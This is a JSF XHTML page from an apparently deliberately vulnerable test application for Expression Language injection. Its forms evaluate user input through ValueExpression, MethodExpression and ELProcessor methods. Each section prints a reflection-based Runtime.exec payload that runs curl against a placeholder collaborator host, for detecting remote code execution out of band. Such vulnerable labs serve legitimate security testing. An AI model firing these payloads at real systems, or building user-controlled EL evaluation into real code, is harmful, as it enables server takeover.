<!DOCTYPE html>
<html
  xmlns="http://www.w3.org/1999/xhtml"
  xmlns:h="http://xmlns.jcp.org/jsf/html"
>
  <h:head>
    <title>EL Injection Test</title>
  </h:head>

  <h:body>
    <p>
      Testing ValueExpression
      <br />
      -> To invoke normally, input
      <h:outputText value="\#{2+2}" escape="false" />
      to get 4
      <br />
      -> To test vulnerability, try this payload: <br />
      <h:outputText
        value="\#{&quot;&quot;.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl http://your.collaborator.payload')}"
        escape="false"
      />
      <br />
      You can get collaborator payload from : https://app.interactsh.com/#/ or
      from burp.
    </p>

    <h:form>
      <h:inputText value="#{elInjectionBean.userInputValue}" />
      <br /><br />
      <h:commandButton
        value="Submit"
        action="#{elInjectionBean.evaluateValueExpression}"
      />
      <br /><br />
      <h:outputText
        value="Evaluation Value Result: #{elInjectionBean.evaluationVResult}"
      />
    </h:form>
    <br />
    <br />

    <p>
      Testing MethodExpression
      <br />
      -> To invoke expected method getSum, input
      <h:outputText value="\#{elInjectionBean.getSum}" escape="false" />
      <br />
      -> To test vulnerability, try this payload: <br />
      <h:outputText
        value="\#{&quot;&quot;.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl http://your.collaborator.payload')}"
        escape="false"
      />
      <br />
      You can get collaborator payload from : https://app.interactsh.com/#/ or
      from burp.
    </p>

    <h:form>
      <h:inputText value="#{elInjectionBean.userInputMethod}" />
      <br /><br />
      <h:commandButton
        value="Evaluate"
        action="#{elInjectionBean.evaluateMethodExpression}"
      />
      <br /><br />
      <h:outputText
        value="Evaluation Method Result: #{elInjectionBean.evaluationMResult}"
        escape="false"
      />
    </h:form>
    <br />
    <br />

    <p>
      Testing ElProcessor.eval()
      <br />
      -> To invoke normally, input 2+2 to get 4
      <br />
      -> For injection payload, directly try -
      "".getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl
      http://your.collaborator.payload')
      <br />
      You can get collaborator payload from : https://app.interactsh.com/#/ or
      from burp.
    </p>

    <h:form>
      <h:inputText value="#{elInjectionBean.userInputELProcessor}" />
      <br /><br />
      <h:commandButton
        value="Submit"
        action="#{elInjectionBean.evaluateELProcessor}"
      />
      <br /><br />
      <h:outputText
        value="ELProcessor eval Result: #{elInjectionBean.evaluationELPResult}"
      />
    </h:form>
    <br />
    <br />

    <p>
      Testing ElProcessor.getValue()
      <br />
      -> To invoke normally, input 2+2 to get 4
      <br />
      -> For injection payload, directly try -
      "".getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl
      http://your.collaborator.payload')
      <br />
      You can get collaborator payload from : https://app.interactsh.com/#/ or
      from burp.
    </p>

    <h:form>
      <h:inputText value="#{elInjectionBean.userInputELProcessorGV}" />
      <br /><br />
      <h:commandButton
        value="Submit"
        action="#{elInjectionBean.evaluateELProcessorGetValue}"
      />
      <br /><br />
      <h:outputText
        value="ELProcessor getValue Result: #{elInjectionBean.evaluationELPGetValue}"
      />
    </h:form>
    <br />
    <br />

    <p>
      Testing ElProcessor.setValue()
      <br />
      -> For injection payload, try
      "".getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl
      http://your.collaborator.payload').inputStream
      <br />
      Don't enter anything in the value field and submit. You'll get an error
      that inputStream is not writable, but check the collaborator for hits.
    </p>

    <h:form>
      <h:outputText
        value="Enter ELProcessor setValue expression: (example - `elInjectionBean.privateConfigValue`)"
      />
      <br />
      <h:inputText value="#{elInjectionBean.userInputELProcessorSV}" />
      <br />
      <h:outputText
        value="Enter ELProcessor setValue value: (example - `any random string`)"
      />
      <br />
      <h:inputText value="#{elInjectionBean.inputValueToSet}" />
      <br /><br />
      <h:commandButton
        value="Submit"
        action="#{elInjectionBean.evaluateELProcessorSetValue}"
      />
      <br /><br />
      <h:outputText
        value="ELProcessor setValue Result: #{elInjectionBean.evaluationELPSetValue}"
      />
    </h:form>
    <br />
    <br />
  </h:body>
</html>
